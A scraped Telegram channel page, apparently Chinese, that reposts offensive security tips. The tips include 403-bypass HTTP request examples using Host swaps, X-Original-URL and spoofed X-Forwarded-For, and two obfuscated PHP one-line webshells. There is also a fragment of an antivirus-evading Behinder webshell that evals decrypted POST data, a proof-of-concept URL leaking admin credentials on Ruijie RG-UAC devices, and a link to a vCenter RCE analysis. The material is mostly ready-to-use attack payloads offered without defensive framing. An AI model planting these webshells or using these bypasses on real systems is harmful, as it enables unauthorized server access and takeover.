信息安全狂热者

Description
本频道只做纯技术分享
Advertising
We recommend to visit

Last updated 2 years, 9 months ago

Last updated 2 years, 9 months ago

官方网站 https://www.yu444.com
客服频道 @kefu
供求频道 @gongqiu
公群频道 @hwgq (汇旺公群首字母)
新群 @xinqun
核心大群 @daqun
记账机器人 @hwjz
公司介绍 @hwdbgs
担保流程 @dbliucheng

Last updated 2 months, 3 weeks ago

2 years, 9 months ago

403 BYPASS 小记
方法一:旁站,有可能是管理员仅设置了主域的权限,那么通过改变旁站,可以越过权限设置
# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET /admin/login HTTP/1.1
Host: $xxx$.abc.com
# 改编后响应
HTTP/1.1 200 OK

方法二:通过URL覆盖的方式,将GET后的URL改为根目录/,其后添加
如:X-Original-URL: /admin/login、X-Rewrite-URL: /admin/login 等
甚至:Referer: https://www.abc.com/admin/login

# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET / HTTP/1.1
X-Original-URL: /admin/login
Host: www.abc.com
# 改编后响应
HTTP/1.1 200 OK

方法三:改变代理服务器,因为现在当下服务基本都是有CDN区做代理,利用如下X打头的非http标准协议改变其代理,诱骗认为访问在本地:
X-Originating-IP: 127.0.0.1、X-Remote-IP: 127.0.0.1、X-Forwarded-For: 127.0.0.1

# 原始请求
GET /admin/login HTTP/1.1
Host: www.abc.com
# 原始响应
HTTP/1.1 403 Forbidden

# 改变请求
GET /admin/login HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: www.abc.com
# 改编后响应
HTTP/1.1 200 OK

2 years, 9 months ago

php一句话
7.x:
<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);

5.x:
<? $a="Y;HJ(Z"^"8H;/Z.";
$a(${"~?}$"^"!x8p"}[1]);

3 years, 1 month ago

Disclaimer:
因本 Channel 符合 Telegram 自动投放广告要求,故订阅者可能会在此 Channel 看到带有 sponsor 或 赞助 字样的消息
特此声明本 Channel 与广告内容投放主无任何关联,现阶段也无法从被投放的广告内容中获得任何形式的回报。故本 Channel 不对其投放内容做任何形式的背书,敬请自行辨认广告内容真伪,谨防上当受骗

3 years, 9 months ago

php7以上 冰蝎免杀马

$post[$i]^$key[$i+1&15]]; $post[$i]=$tmp[$post[$i]]; } } else { $post=openssl\_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function \_\_construct($p) {eval($p."");}} @new C($params); } ?>
3 years, 9 months ago

锐捷 RG-UAC 统一上网行为管理审计系统 账户硬编码漏洞
poc:
https://127.0.0.1/get_dkey.php?user=admin成功访问后,可看到该系统的超级管理员权限账号、访客权限账号、审计权限账号的 账户名 和 MD5 加密的密码值

3 years, 10 months ago

http://noahblog.360.cn/vcenter-6-5-7-0-rce-lou-dong-fen-xi/

root@cyberworld:~# Noah Lab

CVE-2021-21972 vCenter Server 文件写入漏洞分析

0x01. 漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向…

4 years ago

内网/域渗透常用命令:https://wadcoms.github.io

We recommend to visit

Last updated 2 years, 9 months ago

Last updated 2 years, 9 months ago

官方网站 https://www.yu444.com
客服频道 @kefu
供求频道 @gongqiu
公群频道 @hwgq (汇旺公群首字母)
新群 @xinqun
核心大群 @daqun
记账机器人 @hwjz
公司介绍 @hwdbgs
担保流程 @dbliucheng

Last updated 2 months, 3 weeks ago